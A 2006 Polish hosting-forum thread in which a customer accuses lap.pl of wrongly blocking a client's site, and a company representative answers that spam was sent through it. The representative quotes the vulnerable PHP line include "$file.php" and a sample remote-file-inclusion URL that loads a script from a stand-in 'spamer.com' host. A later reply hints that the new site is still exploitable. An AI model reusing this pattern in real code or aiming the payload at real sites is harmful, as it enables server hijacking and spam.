lap.pl - odradzam

[Lesiu]

Wiele firm hostingowych sprawdzalem, w wielu mialem rozne konta i z przykroscia musze stwierdzic, ze na kolejnej sie zawiodlem. Na szczescie konto w firmie lap.pl nie bylo moje a mojego klienta. Wszystko dzialalo w miare niezle przez prawie jeden rok. Co prawda zdarzaly sie pady zarowno samych stron klientow firmy lap.pl jak i tez strona tej smiesznej firmy.

Aby uzyskac informacje o osobnym adresie IP dla konta nalezy wyslac maila... koszt to 100 PLN netto / rok... drogo. Ceny kazdy ustala sobie sam i maja prawo brac nawet i 1,000 PLN jesli chca.

Najgorsza rzecz miala miejsce dzis od rana gdy chcialem zalogowac sie na FTP aby pobrac logi z wczorajszego dnia - wyskoczyl blad, dostep do panelu klienta zablokowany a strona nie dziala. Zamiast niej widnieje informacja, ze strona zablokowana przez administratora i prosba o kontakt na maila administratora firmy lap. Wlasciciel zablokowanej strony zadzwonil do dzialu sprzedazy bo numeru telefonu do dzialu technicznego brak. Zostal poinformowany, ze ktos z jego konta hostingowego rozsylal spam i konto zostalo zablokowane. Jest to oczywiscie klamstwo bo nikt spamu nie rozsylal! Obiecali, ze niebawem konto odblokuja. Jak obiecali, tak zrobili. Strona zaczela dzialac, na FTP tez moglem sie zalogowac... ale jakims cudem pliki z logami z 3 ostatnich dni zostaly usuniete. Warto podkreslic, ze w logach byly zapisywane rowniez polaczenia ze squirrelmail, z ktorego korzysta wlasciciel konta. Domyslilem sie, ze musieli usunac logi zeby nikt nie udowodnil im, ze z konta zaden spam nie wychodzil....

...no wlasnie, to jeszcze nie wszystko. Po kilkunastu minutach znow zablokowali konto. Na maile nie odpisuja, telefonow nie odbieraja. Warto zaznaczyc, ze posiadaja tylko telefony komorkowe. Maile wysylane na konto wlasciciela uslugi wracaja.

No coz... czas przeniesc kolejnego klienta do porzadnej firmy.

[zeus]

Mam prośbę - dodaj swoją opinię do serwisu z mojej stopki (nie będe wstawiał linka bo zostane posądzony o reklamę)

[.Grzesiek]

Na szczescie konto w firmie lap.pl nie bylo moje a mojego klienta.

tym zdaniem przekroczyłeś granice absurdu

[Lesiu]

I dlatego wlasnie mojego klienta przenosze do innej firmy. Jesli byloby to moje konto to nie czekalbym tak dlugo. Klient chcial poczekac do skonczenia umowy czyli do listopada. Sytuacja go zmusila do szybszej przeprowadzki

Zeus, ocene w na Twojej stronie juz wyrazilem.

PS. Firma lap nadal nie odbiera telefonu, na maile nie odpisuje. Po co wiec wstawili na strone mojego klienta jakas glupkowata zaslepke z prosba o mailowy kontakt skoro nie chca odpisac?

[Lesiu]

Dostalem w koncu odpowiedz od admina smiesznej firmy lap. Cytuje ją ponizej:

Witam,

Przez Państwa stronę w dniu wczorajszym zostały wysłane maile

spamerskie. Prawdopodobnie występuje dziura w kodzie strony, którą

wykorzystują roboty spamujące.

Strona została zablokowana w nocy dnia 31.08.2006. Może zostać odblokowana,

gdy będziemy mieć pewność, że wysyłanie spamu przez Państwa stronę się

nie powtórzy.

Proszę poprawić kod strony, tak by wysyłanie spamu nie było

możliwe.

Informuję, że zgodnie z regulaminem lap.pl

(https://lap.pl/regulamin.html), III. Obowiązki Abonenta, § 4:

Abonent zobowiązany jest do nie wykorzystywania technik określanych mianem Spamu

na koncie dostarczonym przez Operatora.

I pozniej kolejny mail:

Witam,

> W imieniu ****** ****** podaję linka do logów, które dotyczą

> wysyłki ponad 14 tysięcy wiadomości przez formularz internetowy na

> stronie:

>

> https://www.lap.pl/formmail.log

>

> --

> Pozdrawiam,

> ***** *****

> Dział techniczny Lap.pl

Warto rzucic okiem jakie to niby są logi. I jeszcze jedno - na stronie nie bylo zadnego formularza. Kopia strony znajduje sie juz na nowym serwerze - www.omarketing.nazwa.pl

Czy mozna wejsc na droge sądową za bezprawne wylaczenie uslugi i narazenie firmy na straty (brak strony oraz poczty elektronicznej przez ponad dobe) czy w Polsce jest to niemozliwe?

Dzien kolejny...

link z "logami" juz nie dziala.

Dostalem tez maila z informacja, ze z "logów" jasno wynikalo, ze byl wysylany spam. Czy ktos z Was przejrzal wczesniej ten wycinek logów i moze mnie oswiecic co wskazywalo na spam?

[Lap.pl]

Witam,

Reprezentuję firmę Lap.pl, wobec której postawione zostały w tym wątku poważne zarzuty - bezprawnego zablokowania strony, a także braku kontaktu czy skasowania logów. Stwierdzenia zaprezentowane przez autora wątku zawierają nieprawdę, wobec czego postanowiłem zabrać głos i przedstawić prawdziwą wersję wydarzeń.

Dnia 31 sierpnia, z konta na którym znajdowała się strona naszego Klienta (autora wątku) zostało wysłanych 14023 wiadomości, określanych popularnie mianem spamu. Z powodu wysyłki spamu, IP jednego z naszych serwerów pojawiło się na tzw. listach RBL (m.in. Spamcop), co przez kilkanaście godzin znacznie utrudniało wysyłanie poczty naszym klientom. W godzinach wysyłki tak dużej liczby maili został również znacznie obciążony nasz serwer, co skutkowało nieco dłuższym okresem czasu oczekiwania na połączenie przez protokół SMTP.

Konto Klienta zostało zablokowane w nocy 31 sierpnia/1 września (kilka minut po północy). W piątek z autorem wątku zostały przeprowadzone 2 rozmowy telefoniczne, zostały również wysłane 2 wiadomości e-mail - obydwie przytoczone powyżej. W pierwszej poinformowaliśmy o przyczynie blokady konta, w drugiej wysłaliśmy linka do logów formmail, wygenerowanych przez Apache-a i zawierających informację o wysyłanych wiadomościach za pomocą funkcji mail() w domenie Klienta.

Do tej chwili nie otrzymaliśmy żadnej odpowiedzi od Klienta w tej kwestii, dlatego tym bardziej zdziwił mnie ten temat, szkalujący dobre imię naszej firmy.

Dysponujemy dokładniejszymi dowodami (poza wspomnianym formmail.log), potwierdzającymi wysłanie spamu:

1) Raporty ze Spamcopu,

2) Na skrzynce Klienta znajduje się ponad 200MB tzw. "zwrotów", czyli maili, które zwróciły od serwerów odbiorców spamu,

3) Spamerzy wykorzystali dziurę w skrypcie Klienta. Faktycznie nie był to formularz, lecz podstawowy błąd w użyciu języka PHP i funkcji include:

Kod:

<?php include "$file.php"; ?>

Na serwerze możliwe jest includowanie plików zdalnych (allow_url_fopen), co niestety przy tego typu "skrypcie" okazało się fatalne w skutkach. Wystarczy, że agresor użył adresu:

https://domena.klienta.pl/?file=https://spamer.com/skrypt

Jedyne co w tej kwestii można nam zarzucić, to włączone allow_url_fopen - zdecydowaliśmy się na taką konfigurację, gdyż jest to często wykorzystywane przez użytkowników. Przed blisko 2 lata nie mieliśmy z tego tytułu problemów, teraz jednak zastanawiamy się nad zmianą i wyłączeniem tej dyrektywy.

W sierpniu mieliśmy kilka innych przypadków ataków spamerów na strony naszych użytkowników. Strony były przez nas blokowane, aby luka nie była dalej wykorzystywana. Każdemu klientowi daliśmy czas na poprawienie dziur, wskazaliśmy gdzie one występują i po ich załataniu przez użytkownika konto było ponownie odblokowywane. Dlatego tym bardziej dziwi i martwi nas sytuacja z tego tematu, gdyż sprawa mogła zostać załatwiona szybko i pomyślnie dla obu stron, bez konieczności wyciągania tego na zewnątrz i pisania nieprawdy o naszej firmie.

Obsługujemy na naszych serwerach kilka tysięcy domen - nigdy nie zdarzyło się i zapewniam, że się nie zdarzy, abyśmy komukolwiek bez podstaw zablokowali konto czy wręcz "wyrzucili" z serwera.

Informuję także, że odpisaliśmy na każdą wiadomość przesłaną nam przez założyciela tematu, czas naszej odpowiedzi nie przekroczył nigdy 24 godzin - był zresztą dużo szybszy.

Co zarzutów typu:

Ceny kazdy ustala sobie sam i maja prawo brac nawet i 1,000 PLN jesli chca.

pozwolicie Państwo, że nie będę się ustosunkowywał.

Pozdrawiam,

Przemysław Deżakowski

[miz]

Cóż, temat jest wyjaśniony, dobrze, ze lap.pl i inni providerzy odzywają się na tym forum bo pozwala wyjaśnić to wiele rzeczy, szkoda tylko, że potem okazuje się, że "user-profesjonalista" robi szkolne błędy i zrzuca to na providera..

ciekawe czy pan Lesiu zdobędzie się chociaz na przeprosiny..

[adek]

kurcze ludzie, ciągle narzekacie na różne krzaki hostingowe (nie chodzi mi o lap.pl , nie znam tej firmy i sie nie wypowiadam). Chcecie mieć serewer na rok za 50 złotych a później jest płacz że administrator serwera akurat wyjechał na wakacje a jego mama nie potrafi właczyć kompa.

Kupujcie serwery na kei, home to skonczą sie wasze problemy. Sam kiedyś połaszczyłem się na tanie konto, do dziś załuje

pozdrawiam

A

[sq-]

easyISP i inni powinni sie uczyc od Lap.pl jak odpowiada sie na zarzuty.

[nrm]

<?php include "$file.php"; ?>

no wlasnie. nie chcialem sie juz wczesniej wcinac ale jak Lesiu podla nowy adres to sprawdzilem to "cudo" i mysle, że Bełdzio by miał tu troche zabawy

https://www.omarketing.nazwa.pl/firl

[Lesiu]

W piątek z autorem wątku zostały przeprowadzone 2 rozmowy telefoniczne, zostały również wysłane 2 wiadomości e-mail - obydwie przytoczone powyżej.

Autor wątku nie jest wlascicielem konta, co zostalo wyraznie opisane w pierwszym poscie.

Informuję także, że odpisaliśmy na każdą wiadomość przesłaną nam przez założyciela tematu, czas naszej odpowiedzi nie przekroczył nigdy 24 godzin - był zresztą dużo szybszy.

I ponownie... zalozyciel tematu nie rozmawial telefonicznie z nikim z firmy lap.

1. Mozna bylo wylaczyc sama usluge serwera www i pozostawic poczte.

2. W takich powaznych przypadkach jak wylaczenie konta wypadaloby skontaktowac sie z klientem telefonicznie i sprobowac rozwiazac problem.

Ale moze Adek ma racje i faktycznie za duzo oczekuje po uslugach hostingowych w takiej cenie.

[Lap.pl]

Autor wątku nie jest wlascicielem konta, co zostalo wyraznie opisane w pierwszym poscie.

Jeżeli autor wątku nie jest właścicielem konta, to nie bardzo rozumiem, dlaczego się wogóle wypowiada na temat, który go nie powinien interesować.

Pozdrawiam

PD

[Lesiu]

Oto 2 glowne powody:

1. Autorowi wątku zalezy na tym by jego klienci byli zadowoleni z uslug zwiazanych z Internetem. Obecnie w Google strona wyswietla sie jako "Strona tymczasowo nieczynna".

2. Aby przestrzec innych przed nieprofesjonalnym zachowaniem pracownikow firmy hostingowej.

PS. Rzucilem przed chwila okiem na logi nowego serwera i widze, ze juz kilka osob probowalo include'owac strone Onetu oraz WP. Nie udalo sie

[horacyleo]

Wrzuce swoje trzy grosze. Mam u nich dwa konta, pomimo tego że zdarzają się im wpadki jakiś pad, to przyznam że żadnego problemu z kontaktem nie mam i jeżeli coś jest nie tak to reakcja jest w normie.

Lesiu skoro opiekun strony robi błędy w dziedzinie bezpieczeństwa to nic dziwnego że klient jest nie zadowolony a jeśli byś postępował fair to nie jechałbyś po firmie która zablokowała ci konto tylko poprawił błędy w skryptach.

A co do nie profesjonalnego zachowania to stwierdzam że jest wiele firm które powinny ich naśladować.

pozdrawiam

PS jedyne moje powiązanie z firmą LAP.PL to to że jestem ich klientem od ponad roku.